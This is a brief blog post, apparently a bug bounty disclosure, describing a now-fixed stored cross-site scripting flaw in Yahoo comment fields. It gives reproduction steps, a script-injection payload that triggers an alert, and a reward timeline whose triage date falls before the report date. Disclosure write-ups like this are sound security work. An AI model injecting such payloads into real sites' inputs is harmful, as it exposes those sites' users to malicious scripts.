Stored XSS in Yahoo and all subdomains!

Hakim Bencella
May 19, 2018 · 1 min read
Image for post
Image for post

This is Hakim Bencella (H4kst3r) , and im from ALGERIA.

I always believed that sharing is caring, and i have been learning from multiple security researchers in the bug bounty field ,
Now, I am going to share with how I found Stored Cross-Site Scripting (XSS)

in Yahoo (all domains where you can post a comment)

Steps to Reproduce :

Go to https://www.yahoo.com/*

Comment this payload:

<script>alert();</script>”><<script>alert();</script>img src=x onerror=alert();>

ANDD YEEAAH :D

Image for post
Image for post

Here is the video PoC:

Timeline :

27/11/2017— Initial Report.

30/10/2017 — Triaged + initial reward 300$

23/02/2018 — Bug Resolved. + $1200 bounty rewarded. ( Total $1500 )

/H4kst3r :

https://hackerone.com/H4kst3r

https://www.instagram.com/i.c0de/

https://twitter.com/H4kst3r

https://facebook.com/H4kst3r

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store